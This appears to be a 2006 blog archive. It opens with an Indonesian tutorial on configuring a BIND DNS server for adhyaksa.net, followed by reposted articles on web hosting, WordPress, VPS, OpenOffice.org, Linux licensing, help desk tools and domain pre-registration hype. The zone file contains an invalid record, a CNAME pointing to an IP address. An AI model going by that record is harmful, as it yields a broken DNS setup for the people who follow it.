"Konfigurasikan sebuah host menjadi PNS dengan nama domain adhyaksa.net mempunyai range IP 192.168.0.1 - 192.168.0.15."
Penentuan IP untuk host-host tertentu, misalnya :
ns1.adhyaksa.net -> IP 192.168.0.1
ns2.adhyaksa.net -> IP 192.168.0.2
www.adhyaksa.net -> IP 192.168.0.3
mail.adhyaksa.net -> IP 192.168.0.3
ftp.adhyaksa.net -> IP 192.168.0.3
mp3.adhyaksa.net -> IP 192.168.0.9
vhost.adhyaksa.net -> IP 192.168.0.13
Untuk IP yang lainnya disimpan untuk keperluan mendatang.

1.Membuat /etc/named.conf
options {
directory "/var/named";
};
zone "." {
type hint;
file "named.ca";
};
zone "adhyaksa.net" {
type master;
file "db.adhyaksa.net";
};
zone "0.168.192.in-addr.arpa" {
type master;
file "db.192.168.0";
};

Membuat file zona untuk domain adhyaksa.net diberi nama db.adhyaksa.net
@ IN SOA ns1.adhyaksa.net. admin.adhyaksa.net. (
200022700 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
@ IN NS ns1.adhyaksa.net.
@ IN NS ns2.adhyaksa.net.
IN MX 10 mail.adhyaksa.net.
ns1 IN A 192.168.0.1
ns2 IN A 192.168.0.2
www IN A 192.168.0.3
mail IN A 192.168.0.3
mp3 IN A 192.168.0.9
vhost IN A 192.168.0.13
ftp IN CNAME 192.168.0.3

Membuat file zona reverse-lookup untuk network 192.168.0 diberi nama db.192.168.0
@ IN SOA ns1.adhyaksa.net. root.localhost. (
200022700 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
IN NS ns1.adhyaksa.net.
IN NS ns2.adhyaksa.net.
1 IN PTR ns1.adhyaksa.net.
2 IN PTR ns2.adhyaksa.net.
13 IN PTR vhost.adhyaksa.net.

Tes hasil konfigurasi
1.Aktifkan bind dengan perintah berikut :
[root@digital /root]# /etc/rc.d/init.d/named start
2.Lakukan pemeriksaan pada /var/log/messages
[root@digital /root]# cat /var/log/messages
3.Cek dengan tool nslookup dan dig

Web Hosting Basics

2006-10-07T08:20:00.000+07:00

Web Hosting Basics

When you decide to take your business to the internet, you need to know some basics. First, you select a name for your site that is catchy and descriptive of your service or product line. Avoid picking a name that does not include a description of what someone would find at the site. One or two word names work well. When you have picked a name that you like, you need to register this as your internet domain name. There are several options in Denver for this if you search online. Remember that you do not have to host your website at the same company where you register your domain name, so look for the best deal you can find.

Denver web hosting can be complex for someone who is just starting out. In fact, most people don’t really understand what hosting is or what a hosting company should offer you. These services are places where you can store your website, basically. They range from free services to hosting that you run yourself on your own server. So the first thing you need to do is figure out how involved you want to be. There are several different types of hosting:

• Internet Service Providers. Several ISPs offer basic web pages for free to their email customers. For example, Yahoo! users can set up a website for free when they join Yahoo!. But these sites are really good only for personal sites with a few pages because alongside your content, an ISP will run advertisements. These sites also do not come with any extra features or very much storage space.

• Free Web Hosting. For most businesses in Denver, web hosting needs to be more sophisticated than most free services can provide. If you want to display your pictures on the web or start a blog online, a free service might be good for you. But for business needs, they simply do not offer the space, the features, or the reliability that you need.

• Paid Hosting. This is the most common type of hosting used for small businesses and more complex personal websites. You pay a monthly or yearly fee to a web hosting company in return for space on their site and certain services. The services and features vary widely from company to company. And you can pay anywhere from two dollars to two hundred dollars per month, depending on the company, how much space you need, and what extra features you employ. You can get CGI services, ASP, ecommerce, SSL, database support, extra space and bandwidth, and other features for maximizing your site for the customer. Paid web hosting, in Denver or elsewhere, is the only way to go for a business site, no matter what its size.

• Domain Hosting. This is a great way for small businesses to host their pages at any location, rather than at the hosting company’s site. You can use an ISP, a free hosting service, or any other viable location. Basically, you buy your domain and then the provider forwards all the requests to the web location. The biggest benefit of this type of hosting, besides the savings you may see, is the fact that you can brand your URL.

• Co-location. If you want to run your own web server and be the owner of your machine, but don’t have the dedicated IT department to maintain it, you can use co-location. This service provides a server holding room where you can store your server, even rent one if you want, and then keep control over your web server and architecture.

• Direct Internet Access. To get the most control over your server, you need to host your site yourself. Obviously, you need some experts on staff to maintain it, but for companies with large data centers this is the only way to go.

Wordpress Templates

2006-10-07T08:19:00.000+07:00

The Basics Of Customizing Wordpress Templates

Do you want to change the look of your WordPress site or maybe to put something like a banner or adsense code on your blog? In order to do this you need to know about three important things: template files, functions and CSS.

- Template Files
These files are stored in a directory (wp-content/themes/template-name/). So if you are using "default theme", you need to access the files that are stored in "wp-content/themes/default/" directory.

There are several common WordPress template files you should know:

1.header.php
This file is responsible for the appearance of the top section of your blog. If you want to change the header image, you have to access this file. Not only that, this file is also the place to add Meta Tags.

2.footer.php
Similar to the header.php, this file is loaded everytime any page or post of your blog is accessed. It is used to store the HTML tags and the code for the bottom section of your blog.

3.sidebar.php
A sidebar is a section which is usually used to display site navigation. Depending on the theme you are using, a sidebar usually provides links to archives, pages and latest posts.

4.index.php
In fact this file is the main template file. When someone visits the homepage of your blog site, this file will be loaded. Then he/she will see the contents (not the source code) of this file. If you want to make the appearance of your blog become similar to a common website, where there is a static description on the homepage, you may try to put the static content in this file.

Besides those files, a theme usually has some other template files with different purposes. For example, the archives.php is a file used to display posts you made in the past. Then the search.php is used to generate search results.

- Functions
A function is a blog of code to accomplish a specific task. In order to modify template files, you don't need to master any programming language. Although having a little knowledge in PHP, you can work faster. In WordPress, the name of a function is usually related to its purpose. For instance, "the_title()" is a function to display the title of a post and "the_content()" is used to display its content. Another example is "blog_info()" which is responsible for displaying the name or description of your blog, depending on the given argument (additional data).

- CSS
Style Sheet is a facility to manage the format and layout of a website efficiently. Without using it, changing small things such as the font type or the background color of all of your webpages is a daunting task where you have to do it page by page. But with the existence of style sheet, one change you make can affect the whole site. You should know that in WordPress a different theme may have a different css file. You also need to know that some styles may be defined in the header.php file. If you are using the "default theme", you have to access the header.php file in order to change the background color or the header image of your blog, not the css file.

Finally, before you customize the templates, it is highly recommended to backup any files you intend to change. If something doesn't work properly, you can always go back to the original settings.

Virtual Dedicated Server

2006-10-07T08:16:00.000+07:00

Advantages Of Cheap Virtual Dedicated Server
Author: Ricky Lim
Most webmasters started off using single domain hosting or shared web-hosting services. Shared web hosting means you share a server with dozens of other webmasters. Typically, shared web hosting plans allows you to have more than 1 domain per shared web hosting account with a predetermined hard disk space and bandwidth. The cost is usually pretty low. You only need to pay around 3-10 dollars per month.

Although it is cheap to host your website on single or shared web hosting accounts, there are many disadvantages you should be aware of.

By the nature of shared hosting, the server resources are shared among many websites, therefore it is very easy for resources such as CPU and memory to be used up quickly. Certain types of websites such as proxy sites are known to generate high CPU utilization, therefore if your website is on the same server, be advised there is a possibility of your website going down. Spam complaints against other sites on the same server will also affect your website. Any form of denial of service attack against someone else hosting can impact on the uptime of your website.

Also some web hosting companies over packed too many hosting accounts on one server causing the server to be slow and sluggish. The end result is your website is up but takes too long to load and display properly.

How can you do to avoid this issue?

Years ago, the only solution is to get a dedicated server. However, nowadays you can get a cheap virtual dedicated server for less than 30 dollars a month.

A cheap dedicated virtual server or VPS allows you to run your sites as if you own the server virtually. In reality, the dedicated server is spilt into multiple virtual dedicated servers. The main advantage is that each virtual dedicated server has control over it’s own resources such as CPU, RAM etc. So each virtual dedicated server is totally isolated from other virtual servers and will not be affected if other webmasters bring their servers down.

Some web-hosting providers also have unmetered bandwidth, which is a plus.

So Are There Any Disadvantages in having a virtual dedicated server?

There are not many major disadvantages except for cost. It will cost a little bit more on hosting. The other disadvantage is you need to be technically proficient in administering the server. However, some web-hosting providers also can provide managed virtual dedicated server. It means they will help you to manage the server. Examples are routine server maintenance, security patches etc.

With increased speed and reliability from using cheap virtual dedicated server, you will rest easy that your websites are always up while you are sleeping.

what's next for OpenOffice.org

2006-09-23T11:06:00.000+07:00

The OpenOffice.org conference is now over. We had some fantastic three days at the INSA of Lyon, and I would like to thank everybody who managed to drop by and visit us. People came from all over the place; Korea, Brazil, India, Bengladesh, Germany, Norway, U.S.A...

This conference could not have been possible without the Francophone community, of which I am a member; so I would like to thank everybody who helped us before and during these three days!

On Monday evening, the 11th of September, we organized the Native-Language Party on a ship that cruised the Rhone and Saone Rivers along the city of Lyon. Besides the actual venue that was outwardly marvellous and very classy, I would like to say, just like I did to one of my American guests there, that even though I didn't mention the 9/11 in my welcoming speech on the ship, I had the feeling that the actual presence of so many people on board, coming from the entire world was in a sense, a beautiful answer to the international terrorism. For Open Source does also mean peace. OpenOffice.org and the Native-Lang Confederation are living evidences of this. I am honoured to lead such a confederation of communities who are building something useful together, and I can experience this on a daily basis.

Now I'm sure you'll be interested by the pics and the transcripts of the conferences! So here you will find the videos and some pics of the conferences. Not all of them have been uploaded yet, so make sure to check back there again for several days. Kudos to the Kiberpipa team from Slovenia who accomplished all this while being asked at the last moment!

Here you will find lots of pictures taken by Jerome D. from Ars Aperta. Here, and also here and there you will find shots from Florian E., Jesus C. and Simon B. from several Native-Lang projects.

The OpenOffice.org Conference is as always the time for major announcements concering the software itself. I recommend that the interested readers take a look at the still being uploaded slides of every conference for more details.

However, I shall disclose the major points that were discussed in Lyon. First, OpenOffice.org shall get Firefox-like extensions capabilities by the 2.0.4. This release should be ready somewhere between the coming week and the end of the month. What this means is that besides the fact that OpenOffice.org could include extensions before, now the way to develop, include, select and manage them will be made easy. Aside the traditionnal .zip and unopkg extensions packages, a new and definitive extension format, .oxt, shall be used across the extensions that can be developed using a breadth of languages ranging from StarBasic to Java. New wizards and configuration tools shall be added for the benefit of our endusers.

Second, and I think that although we have no clear roadmap for this yet (besides, our version naming scheme is going to change once again ), OpenOffice.org and StarOffice shall include the Mozilla Foundation's Thunderbird and Sunbird (calendaring application) in the future. Besides the inclusion of those two softs inside the office suite, connectors to Sun Calendar Server and Microsoft Exchange will also be developed accordingly.

Third, a word on the 3.0. A few months ago we change our release process as to accomodate more and more community's input and patches; and so we switched to a fully incremental, quarterly release schedule. Which in turns, makes the famous 3.0 rather unpredictable as to what its feature set and characteristics could be. This is why it is useless to look for a weird prototype of it quietly sitting in a virtual Area-51. The only objective of the 3.0 will be to make it much more modular and running on tops of frameworks such as Eclipse, Netbeans or Mozilla's XUL.

In any case, feel free to get a look at the conferences' slides, they are really worth it... And as you may not know, OpenOffice.org will celebrate its sixth anniversary, so stay tuned!!!

How much abuse will you take from Microsoft?

2006-09-23T11:00:00.000+07:00

Seriously, how many times must users and businesses be kicked in the face before they buy a clue? Before they realize that they don't have to stay in the abusive Microsoft relationship. The answer seems to be: an unlimited number of times.

Take, for example, Internet Explorer. In the latest bad news, the newest zero-day flaw in the Internet Explorer implementation of the Vector Markup Language has opened up a gaping wound in Windows. Through that wound, every kind of garbage imaginable -- bots, Trojan down-loaders, spyware, rootkits -- are pouring into Windows systems.

You think you're safe because you do all the right things in patching your systems? Think again, this hole exists even in fully-patched version of Windows XP SP2 running IE 6. Right now, this very moment, if you go to the wrong site with IE 6, your system is going to get as sick as a dog and You Can't Do Anything About It.

Well, actually, there is one thing you could do. You could switch from vermin-ridden Windows to a desktop Linux. For businesses, I recommend SLED (SUSE Linux Enterprise Desktop) 10. For home users, Ubuntu 6.06, SimplyMEPIS 6.0, Xandros 4, or Freespire are all excellent choices.

Not sure how to do it? No problem. IBM has just published a free 376-page book, the Linux Client Migration Cookbook, on how to jump from Windows to Linux.

OK, so you're not ready to do that. Fine, then would you do yourself the favor of at least dumping IE and using Firefox instead? Yes, Firefox has security problems, too. But, you know what? They tend to be fixed fast -- and there has never, I repeat, never been a significant Firefox-based malware attack of any kind.

Internet Explorer? It takes forever for some problems to be fixed. Worse still, even when Microsoft "fixes" a problem they sometimes can't get it right the first time, or even the second time. They finally did get it right the third time... but, of course, it was only after that, that the floodwaters of filth came pouring into the hole the folks from Redmond hadn't patched.

What will it take?

Some Microsoft users swear that they trust Microsoft to get it right. Is that the same kind of right as when Microsoft tried to slip by us the fact that the Zune, their answer to the iPod, won't play Microsoft's own PlaysForSure media files?

The only thing I'm sure of about Microsoft is that they believe that there's a sucker born every minute. So far, it seems that they're right, as users continue to stand by their shoddy goods, without even seriously considering the competition.

My only hope for most of these poor fools is that Vista's price tag will make them at least consider an alternative to Windows on their desktops. And, since Microsoft doesn't have a strangle-hold on the portable music market, buyers will have the good sense to not give Zune a chance to trap their music in a new Microsoft DRM (digital rights management) prison.

-- Steven J. Vaughan-Nichols

rocketed Linux to success

2006-09-23T10:54:00.000+07:00

GPL, BSD, and NetBSD - why the GPL rocketed Linux to success

Charles M. Hannum (one of the 4 originators of NetBSD) has posted a sad article about serious problems in the NetBSD project, saying "the NetBSD Project has stagnated to the point of irrelevance." You can see the article or an LWN article about it.

There are still active FreeBSD and OpenBSD communities, and there's much positive to say about FreeBSD and OpenBSD. I use them occasionally, and I always welcome a chance to talk to their developers - they're sharp folks. Perhaps NetBSD will partly revive. But systems based on the Linux kernel ("Linux") absolutely stomp the *BSDs (FreeBSD, OpenBSD, and NetBSD) in market share. And Linux-based systems will continue to stomp on the *BSDs into the foreseeable future.

I think there is one primary reason Linux-based systems completely dominate the *BSDs' market share - Linux uses the protective GPL license, and the *BSDs use the permissive ("BSD-style") licenses. The BSD license has been a lot of trouble for all the *BSDs, even though they keep protesting that it's good for them. But look what happens. Every few years, for many years, someone has said, "Let's start a company based on this BSD code!" BSD/OS in particular comes to mind, but Sun (SunOS) and others have done the same. They pull the *BSD code in, and some of the best BSD developers, and write a proprietary derivative. But as a proprietary vendor, their fork becomes expensive to self-maintain, and eventually the company founders or loses interest in that codebase (BSD/OS is gone; Sun switched to Solaris). All that company work is then lost forever, and good developers were sucked away during that period. Repeat, repeat, repeat. That's enough by itself to explain why the BSDs don't maintain the pace of Linux kernel development. But wait - it gets worse.

In contrast, the GPL has enforced a consortia-like arrangement on any major commercial companies that want to use it. Red Hat, Novell, IBM, and many others are all contributing as a result, and they feel safe in doing so because the others are legally required to do the same. Just look at the domain names on the Linux kernel mailing list - big companies, actively paying for people to contribute. In July 2004, Andrew Morton addressed a forum held by U.S. Senators, and reported that most Linux kernel code was generated by corporate programmers (37,000 of the last 38,000 changes were contributed by those paid by companies to do so; see my report on OSS/FS numbers for more information). BSD license advocates claim that the BSD is more "business friendly", but if you look at actual practice, that argument doesn't wash. The GPL has created a "safe" zone of cooperation among companies, without anyone having to sign complicated legal documents. A company can't feel safe contributing code to the BSDs, because its competitors might simply copy the code without reciprocating. There's much more corporate cooperation in the GPL'ed kernel code than with the BSD'd kernel code. Which means that in practice, it's actually been the GPL that's most "business-friendly".

So while the BSDs have lost energy every time a company gets involved, the GPL'ed programs gain every time a company gets involved. And that explains it all.

That's not the only issue, of course. Linus Torvalds makes mistakes, but in general he's a good leader; leadership issues are clearly an issue for some of the BSDs. And Linux's ability early on to support dual-boot computers turned out to be critical years ago. Some people worried about the legal threats that the BSDs were under early on, though I don't think it had that strong an effect. But the early Linux kernel had a number of problems (nonstandard threads, its early network stack was terrible, etc.), which makes it harder to argue that it was "better" at first. And the Linux kernel came AFTER the *BSDs - the BSDs had a head start, and a lot of really smart people. Yet the Linux kernel, and operating systems based on it, jumped quickly past all of them. I believe that's in large part because Linux didn't suffer the endless draining of people and effort caused by the BSD license.

Clearly, some really excellent projects can work well on BSD-style licenses; witness Apache, for example. It would be a mistake to think that BSD licenses are "bad" licenses, or that the GPL is always the "best" license. But others, like Linux, gcc, etc., have done better with copylefting / "protective" licenses. And some projects, like Wine, have switched to a protective (copylefting) license to stem the tide of loss from the project. Again, it's not as simple as "BSD license bad" - I don't think we fully understand exactly when each license's effects truly have the most effect. But clearly the license matters; this as close to an experiment in competing licenses as you're likely to get.

Obviously, a license choice should depend on your goals. But let's look more carefully at that statement, maybe we can see what type of license tends to be better for different purposes.

If your goal is to get an idea or approach widely used to the largest possible extent, a permissive license like the BSD (or MIT) license has much to offer. Anyone can quickly snap up the code and use it. Much of the TCP/IP code (at least for tools) in Windows was originally from BSD, I believe; there are even some copyright statements still in it. BSD code is widely used, and even when it isn't used (the Linux kernel developers wrote their own TCP/IP code) it is certainly studied. But don't expect the public BSD-licensed code to be maintained by those with a commercial interest in it. I haven't noticed a large number of Microsoft developers being paid to improve any of the *BSDs, even though they share the same code ancestries in some cases.

If your goal is to have a useful program that stays useful long-term, then a protective ("copylefting") license like the LGPL or GPL licenses has much to offer. Protective licenses force the cooperation that is good for everyone in the long term, if a long-term useful project is the goal. For example, I've noticed that GPL projects are far less likely to fork than BSD-licensed projects; the GPL completely eliminates any financial advantage to forking. The power of the GPL license is so strong that even if you choose to not use a copylefting license, it is critically important that an open source software project use a GPL-compatible license.

Yes, companies could voluntarily cooperate without a license forcing them to. The *BSDs try to depend on this. But it today's cutthroat market, that's more like the "Prisoner's Dilemma". In the dilemma, it's better to cooperate; but since the other guy might choose to not cooperate, and exploit your naivete, you may choose to not cooperate. A way out of this dilemma is to create a situation where you must cooperate, and the GPL does that.

Again, I don't think license selection is all that simple when developing a free-libre/open source software (FLOSS) program. Obviously the Apache web server does well with its BSD-ish license. But packages like Linux, gcc, Samba, and so on all show that the GPL does work. And more interestingly, they show that a lot of competing companies can cooperate, when the license requires them to

List web based Help Desk

2006-09-16T14:03:00.000+07:00

ManageEngine

ManageEngine ServiceDesk Plus is a web based Help Desk and Asset Management software whose features include contract managenent, purchasing and knowledge management functionalities. It integrates Ticketing, Asset Tracking, Purchasing, Contract Management and Knowledge base in one package. ServiceDesk Plus enables end-users to submit tickets via an online web form or through email. It automates several tasks such as case routing, acknowledging requester, technician notification and handling of SLA rules. It includes a Solutions module that allows you to document best practices and solutions to common problems in an online knowledge base.

ServiceDesk Plus offers inventory tracking functionality across Windows and Linux workstations. It can also track software licenses and let you know the number of over-utilized or under-utilized licenses across your organization.

LiveTime

LiveTime Help Desk provides an enterprise-wide solution for delivering customer service and support. With support for IT Infrastructure Library (ITIL) best practices and a user interface IS team members can have access to audit trails of every case in just a few clicks. With a built-in self-service portal, comprehensive alerting system and knowledge infrastructure, IS staff can focus on solving complex problems and let the system deal with common solutions to everyday problems. LiveTime Help Desk is based on an Internet infrastructure which can be accessed from any browser, with no plug-ins, no client maintenance and no client updates. LiveTime provides pre integration with many third party products, such as Asset Management solutions, and CRM systems.

GoverLAN
GoverLAN is a remote administration, user support and enterprise desktop management suite for Windows NT and Active Directory platforms. It is equally a critical asset for enterprise administrators, system administrators and technical support teams.

The GoverLAN Suite is composed of three main features:
GoverLAN Scope Actions: GoverLAN Scope Actions are a new concept in GoverLAN and represents a major improvement in what GoverLAN has to offer. This new feature empowers you to take control of your machines, users and groups as a whole. Every piece of information, every setting, and every action can now be reported, modified and executed at a scope level.
GoverLAN Administration & Diagnostics: Use GoverLAN to execute real-time remote administration and troubleshooting on your users, computers and groups.
GoverLAN Remote Control: 80% of the GoverLAN Remote Control code has been re-written to provide you with a much faster, more secure remote control feature. Support for clients with multi-monitors has also been added.

:: Company :: PJ Technologies, Inc.
:: URL :: www.pjtec.com
:: Email :: info@pjtec.com
:: Screenshot :: click here
:: Price :: $549.00

Web Based Help Desk Software

2006-09-16T13:57:00.000+07:00

Web Based Help Desk Software

There are many reasons companies have turned to Web-based software in lieu of traditional stand-alone applications. One of the most notable benefits of Web-based software, is of course, the advantages it poses for companies with multiple locations, satellite offices and traveling employees. Web-based applications can be accessed from any place that has an Internet connection.

Web-based software is also much easier to manage in terms of installation and upgrades. Once an upgrade or change is installed on the server, all users have immediate access. There is no need to upgrade individual PC's, and migration issues no longer take up valuable DBA and technician resources. Finally, Web-based applications are much more cost-effective to deploy, as all users are accessing it through a browser. There is also then, no need for testing on different operating systems and hardware/software configurations.

Simplifying Customer Service Tasks
Web-based help desk software uses the power and universality of the Internet to manage and simplify customer service tasks. With our application, managers can have access to real-time customer trends, speed call turnaround and increase customer satisfaction. It also allows users to remotely check ticket progress, submit requests and view service bulletins.

Help Desk was designed to operate as both a stand-alone application or one that is integrated with other Eden, or third party business software solutions. It was developed to align with ITIL® best practices, and can easily be maintained on any J2EE compliant application server, or Eden can host the solution for you. Our Help Desk is user-friendly enough that it rarely requires technical support, but just in case, Eden maintains a staff of highly-trained technicians to answer your questions 24 hours a day.

Web Based Help Desk

2006-09-16T10:52:00.000+07:00

A help desk that allows you to provide comprehensive service through a central ticketing system while balancing work flow between your site operators. Some of the features include a powerful email parser for email communication, separate public interfaces, a fully integrated knowledgebase, “Ajax” enabled work flow management features, and live chat integration options.

SupportTrio allows you to easily track, manage, and respond accurately to your visitor’s support queries. It eases your support load and provides better support management. The user and the visitor can track and update support tickets through a centralized location. Ticketing avoids the inherent confusion and pitfalls of email support. The ticket are archived and can be accessed at a later date

How To Win The .BIZ - .INFO Domain Lottery.

2006-09-15T11:13:00.000+07:00

Anyone can win a million-dollar name, Really!

You have heard how the Internet is like the Old Wild West?
You have not seen anything yet. The greatest Internet gold
rush lottery will start June 25th, and probably no one
told you. The prediction is that over 5 million new .BIZ and
.INFO Domain Names will be registered within the first few
hours. Like the old days when settlers lined up for a Free
Land Grab, a select group of "in the know" businesses and
entrepreneurs are now quietly lining up by pre-registering
before the opening day of the land rush lottery. For the first
time the "little guy" can join them in the game and get a
million-dollar name for $20 to $40. In fact you could get
several Domain treasures by pre-registering.

These new ICANN approved Domain extensions, the first
in over 10 years, will quickly become the dot extensions of
choice for the Internet, next to the Big Chief .COM.

1. .COM
2. .BIZ
3. .INFO

In the past developers and squatters had several years head
start on the good .COM Domain Names. This was also true
with the .CC, .TV, .WS and all the other dot extensions.
The really good Domain Names were pulled by the
promoters before the names were offered to the general
public. This time you have the same chance to get those
million dollar Domain Names as the wheelers and dealers.

The only exception is that trademark owners can register
their Domain trademark names now for a filing fee of
$199.75 (includes five years registration). The Trademark
Owners advantage ends June 24th.

The Starting Gun Will Fire June 25th.
On this date the .BIZ registration Land Rush lottery will
open, followed by the opening of the .INFO public lottery
on July 25th.

All Domain Names pre-registered at that time (not
registered by the Trademark owners) will go into the
"hopper." The new Domain database holders, NeuLevel
(.BIZ ) and Afilias (.INFO), will then select Domain Names
at random from each of the different Domain Name
registrars, round-robin fashion. Yes, it will be a real lottery.

The random lottery drawings will continue until August
22nd for .INFO Domains and September 29th for .BIZ
Domains. At that time the remaining Domain Names
will be sold by standard registration methods.

How To Win Those Million-Dollar Domain Names

The Secrets...

1. Most Important Pre-Register Now! You want to be
among those put into the "hopper" first. You should
pre-register before the starting day. After that the whole
world will know about the Land Rush.

2. You can vastly increase your odds by pre-registering
the same .INFO names with several Domain Name
registration companies.

3. You can now buy several "tickets for the same .BIZ
Domain Name from the same registration company.

Like the lottery, you are simply buying more tickets but with
different companies each having their "own" drawings from
the same pot. You don't care which registrar gets that great
Domain Name for you, just so it is registered to you.

How Much Does It Cost For A Pre-Register Lottery
Ticket For A New .BIZ Or .INFO Domain?
>From FREE to $27,250.00 per name.

1. FREE Pre-Registrations.
http://newdomains.networksolutions.com
Network Solutions (Internic) has been collecting .BIZ and
.INFO Domain Names for pre registration for months.
They probably have over a million new .info and .biz names
pre-registered. The good news is you can add your selection
to this list for FREE.

By all means, pre-register your .BIZ and/or .INFO Domain
desires with Internic. If you actually get that great new
Domain Name you will only have to pay Internic (about
$70.00) for the first two years.

Our suggestion is to register every great new Domain Name
you can afford to pay for into the Internic que. (I
pre-registered
about 40 .BIZ and .INFO names with Internic myself.) Of
course, just because you have a great new Domain
pre-registered with one registration company, it does not
mean you will get the name. If your Domain choice is
pre-registered by someone with another registration
company whose list is filed first, they will get the Domain.
But try to pre-register the names you desire. As the
expression goes, "It is hard to beat FREE!"
Late Breaking .BIZ Information...

NeuLevel (BIZ master database holder) received the OK
from ICANN to charge fee for every .BIZ Domain
pre-registered until the end of the Land Rush Lottery
period. This non-refundable fee is $10.00 per
pre-registered .BIZ Domain. Some registrars like
Domain Name Vault are discounting this fee to $6.00
and down to $4.50 depending on volume. Many
registrars are still offering free .BIZ Domain
pre-registrations but the free pre-registration does
not include in the Round-Robin lottery. Your actual
free .BIZ registration may not be submitted until after the
lottery.

More Late Breaking .BIZ Information...
Now like the lottery... You can buy as many
pre-register "tickets" as you desire for a specific
.BIZ Domain Name.

2. Paid Pre Registrations.
Due to the large numbers of Internic free pre-registered
.BIZ and .INFO Domains, your odds for getting a hit are
low. The odds increase when you go to a Domain Name
registration company whose que has smaller numbers, i.e.
a paid pre-register. Because the Domain Names are fed
into the database at random from each registrar, the
smaller registrars should get their list of Domains
registered first (as it is a smaller number).

$1.00 Per Name Pre-Registration.
Domain Name Vault will pre-register your choice for $1 per
name, minimum of twenty names. The money is
non-refundable. Any new Domain Names you actually
obtain, you will pay the discounted Domain price of $19.95
per year, two year minimum.
http://DomainNameVault.com

$6.00 Per .BIZ Name Pre-Registration.
Domain Name Vault will discount the $10 pre-registrations
fee your .BIZ choice for $6 per name. You can pre-register
as many "tickets" for the same name as you desire at $6.00
each and down to $4.50 by volume. The money is
non-refundable. Any new Domain Names you actually
obtain, you will pay the discounted Domain price of
$19.95 per year, two year minimum.
https://pollux.safe-order.net/domainnamevault/BizPreReg.htm

The lower number in the Domain Name Vault que should
increase your chances of obtaining your selected new
.INFO Domains. (I also pre-registered the same 40 new
.BIZ - .INFO Domain Names as I did with Internic to
increase my odds of success)

New ICANN Approved Rules...
You can now buy as many "tickets" for a specific
.BIZ Domain Name as you desire.
This will increase your odds of winning.
As an example: you can buy 20 pre-registration tickets for
"Loans.BIZ," your investment for the twenty names ($6.00
per ticket) is $120.00. If you win the Loans.BIZ Domain
you will then pay only $19.95 per year (two year min.)
The more .BIZ "tickets" pre-registered the better chance
of winning.

.INFO Name Pre-Registration.
.INFO Pre-Registration are still only $1.00 (at least at
Domain Name Vault.) The rules are different for .INFO.
There is only one pre-registered specific name per
registrar. To win your best bet is to register your favorite
.INFO Domain with several registrars.

$10.00 Per Name Pre-Registration.
http://www.NewInternetExtensions.com will pre-register
your choice for $10.00 per name. The money is also
non-refundable. Any New Domain Names you actually
obtain you will pay an additional $50.00 - $60.00.
There are already over 250,000 .BIZ - .INFO pre-registered
Domains here to date, so you will be on a large waiting list.
(I also pre registered my 10 best Domain Name choices.)
This $10.00 non-refundable $10.00 fee may become
the rule.

$7,560.00 Up Per Name Pre-Registration.
Yes, that's not a typo. And the bidding seems to start at
$7,560.00 per Domain. http://www.eNom.com will
pre-register .BIZ - .INFO Domains but you must bid
against others desiring the same name and the highest
bidder will get the Domain Name. You pick any .BIZ -
.INFO name and make a bid.

This has to be the craziest Domain Name deal ever. eNom
Domain Registrar is auctioning off things they do not own
and remember eNom.com may not get any Domains bided.

The current top three .BIZ - INFO Domains in the eNom
bidding game are:

* golf.info current bid $27,250.00
* computers.biz current bid $10,000.00
* xxx.biz current bid $8,020.00

Want to know the top 50 requested .BIZ - .INFO Domains?
https://www.enom.com/NewTLDs/TopRequests.asp

Isn't America great? As I see it, paying the $27,250.00
price for golf.info will have the same success odds as the
$1 pre-registration. Duhh... (I did not place a bid with
eNom but if you have big bucks to play the game, go for it!)
The Bottom Line

1. Get pre-registered for your .BIZ and
.INFO names NOW!
There will never be an Internet gold rush like this one.
Remember, if you get a .BIZ and .INFO Domain Name
you will be charged. You will want to choose wisely and
register only as many Domains as you can afford to pay
if you actually get the name(s). The cost, depending on
where you pre-register should be between Domain
Name Vault's discount price of $19.95 up to Internic's
$35.00 per year (both two years minimum). If you get
one of these million-dollar names and decide not to use
it you can always resell the name for big bucks.
https://pollux.safe-order.net/domainnamevault/BizInfoPreReg.htm

2. Pre-register the same Domain with several different
Domain Name registration companies.
If your chosen .INFO name is already selected by someone
else, do not be discouraged. Go to another registration
company. Remember NO .BIZ or .INFO Domains have
actually been registered anywhere... you still have a chance!

3. Pre-register the same .BIZ Domain with several
times with the same Domain Name
registration company.
.BIZ Domain Name odds can be increased by buying
several pre-register "tickets" with the same registrar.

Links...
http://newdomains.networksolutions.com
https://pollux.safe-order.net/domainnamevault/BizInfoPreReg.htm
http://www.NewInternetExtensions.com
https://www.enom.com/NewTLDs/TopRequests.asp

Two More .BIZ And .INFO Domain Tips.
A. Protect Your Trademark.
Trademark owners can keep the squatters away by
registering .BIZ, .INFO names during Sunrise Period.
Save a lot of lawyer fees by registering your Trademark
with .Info and .Biz. This is your cheapest insurance to
protect your Trademark. Special advance registration
will end on June 24h, after that all new .BIZ Domain
Names are up for grabs.
Trademark Owners Pre-register Now!
https://pollux.safe-order.net/domainnamevault/SunrisePreReg.htm

B. Protect Your Current ".COM" Domain.
You can keep the squatters away by registering .BIZ -
.INFO backups. We are protecting our Domain Name
"SubmitPro5000.com" by pre-registering
"SubmitPro5000.biz" and "SubmitPro5000.info."
This is cheap insurance to protect our Web future.
It will be smart to pre-register all Domains you need for
your business and a few more on speculation. Do not
put this off, do it now. If you choose the Domain Name
wisely it will be worth many times what you paid.
Remember, hot Domain Names are selling for hundreds
of thousands of dollars, and a few are selling for
over a million.

Pay attention! Don't let this chance of a lifetime slip by,

Get ready for the Land Rush!

Think You Control Your Domain Name? Think Again!

2006-09-15T11:09:00.000+07:00

Permission is granted for free publication of this article, either electronically or in print, provided both the bylines and resource box are included. A courtesy copy of your publication would be appreciated.

Let me ask you some questions that may sound "obvious" but can have downright scary answers. Did you buy your domain name from a service? Do you know who is in control of your domain name? Have you done a "Whois" search to find out? The answer may very well shock you!

Buying a domain name is a very easy thing to do. But if you buy a domain name without any knowledge of "ownership" vs. "control", you could very well be headed down a bumpy road.

Unfortunately, most Web site owners are unaware that "ownership" does not equate to "control." Just because you paid for your domain name does not mean you have access or authority to make changes, transfers or other necessary functions. But if not you - the owner - who does?

There are 4 components to a domain name:

1.Registrant: you - the person who registered the domain name
2.Billing Contact: could be anyone
3.Technical Contact: could be anyone
4.Administrative Contact: could be anyone

The registrant is you. You might assume that items two, three and four are also you. A natural assumption. Guess what… most of the time they are not! THIS is where you get into trouble.

Who's In Control?

